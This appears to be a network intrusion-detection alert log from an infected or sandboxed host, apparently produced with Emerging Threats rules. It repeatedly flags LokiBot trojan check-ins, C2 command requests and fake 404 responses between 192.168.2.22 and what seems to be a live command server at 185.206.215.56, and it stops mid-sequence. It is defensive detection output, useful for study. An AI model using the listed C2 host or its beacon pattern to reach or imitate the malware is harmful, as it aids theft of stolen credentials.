01/05/21-19:06:16.358508 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.358508 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.358508 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.531882 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49190 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:16.795879 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.795879 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.795879 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.795879 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.967213 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49191 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:17.183871 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.183871 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.183871 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.183871 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.344388 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49192 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:17.566777 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.566777 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.566777 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.566777 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.726876 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49193 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:17.949146 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.949146 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.949146 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.949146 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.134410 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49194 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:18.364453 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.364453 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.364453 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.364453 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.531194 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49195 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:18.788238 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.788238 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.788238 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.788238 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.959883 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49196 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:19.176157 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49197 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.176157 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49197 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.176157 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49197 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.176157 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49197 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.341245 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49197 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:19.576040 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49198 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.576040 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49198 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.576040 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49198 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.576040 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49198 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.751716 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49198 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:19.958724 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49199 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.958724 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49199 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.958724 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49199 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:19.958724 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49199 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.125690 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49199 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:20.390921 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49200 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.390921 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49200 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.390921 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49200 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.390921 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49200 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.569029 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49200 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:20.950521 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49201 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.950521 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49201 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.950521 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49201 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:20.950521 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49201 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:21.111865 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49201 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:21.679580 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49202 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:21.679580 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49202 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:21.679580 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49202 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:21.679580 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49202 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:21.837782 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49202 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:22.303822 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49203 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.303822 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49203 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.303822 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49203 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.303822 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49203 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.484253 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49203 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:22.694392 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49204 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.694392 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49204 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.694392 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49204 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.694392 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49204 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:22.877247 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49204 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:23.094147 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49205 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.094147 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49205 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.094147 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49205 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.094147 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49205 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.267446 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49205 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:23.470458 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49206 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.470458 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49206 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.470458 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49206 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.470458 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49206 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.640827 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49206 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:23.862730 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49207 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.862730 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49207 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.862730 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49207 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:23.862730 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49207 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.026554 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49207 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:24.246261 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49208 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.246261 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49208 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.246261 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49208 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.246261 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49208 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.440570 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49208 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:24.648294 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49209 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.648294 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49209 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.648294 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49209 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.648294 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49209 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:24.816571 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49209 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:25.024326 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49210 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.024326 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49210 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.024326 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49210 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.024326 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49210 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.203072 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49210 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:25.428992 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49211 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.428992 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49211 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.428992 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49211 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.428992 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49211 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.591475 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49211 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:25.813759 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49212 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.813759 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49212 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.813759 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49212 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.813759 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49212 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:25.992160 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49212 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:26.197896 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49213 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.197896 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49213 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.197896 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49213 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.197896 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49213 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.381041 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49213 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:26.599441 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49214 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.599441 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49214 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.599441 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49214 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.599441 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49214 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.766199 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49214 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:26.971788 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49215 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.971788 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49215 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.971788 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49215 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:26.971788 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49215 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.131364 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49215 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:27.359759 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49216 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.359759 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49216 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.359759 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49216 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.359759 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49216 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.547159 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49216 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:27.753620 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49217 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.753620 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49217 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.753620 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49217 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.753620 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49217 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:27.916227 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49217 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:28.127709 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49218 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.127709 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49218 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.127709 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49218 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.127709 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49218 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.287151 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49218 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:28.505441 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49219 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.505441 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49219 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.505441 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49219 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.505441 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49219 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.661950 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49219 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:28.880701 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49220 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.880701 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49220 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.880701 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49220 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:28.880701 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49220 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.048592 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49220 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:29.244495 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49221 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.244495 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49221 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.244495 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49221 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.244495 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49221 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.409620 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49221 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:29.630364 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49222 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.630364 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49222 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.630364 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49222 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.630364 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49222 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:29.797474 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49222 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:30.014888 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49223 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.014888 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49223 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.014888 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49223 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.014888 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49223 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.193197 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49223 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:30.409915 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49224 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.409915 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49224 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.409915 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49224 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.409915 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49224 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.572043 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49224 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:30.786520 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49225 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.786520 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49225 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.786520 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49225 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.786520 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49225 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:30.947633 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49225 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:31.159641 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49226 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.159641 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49226 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.159641 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49226 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.159641 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49226 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.319802 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49226 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:31.542986 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49227 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.542986 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49227 | 80 | 192.168.2.22 | 185.206.215.56 |
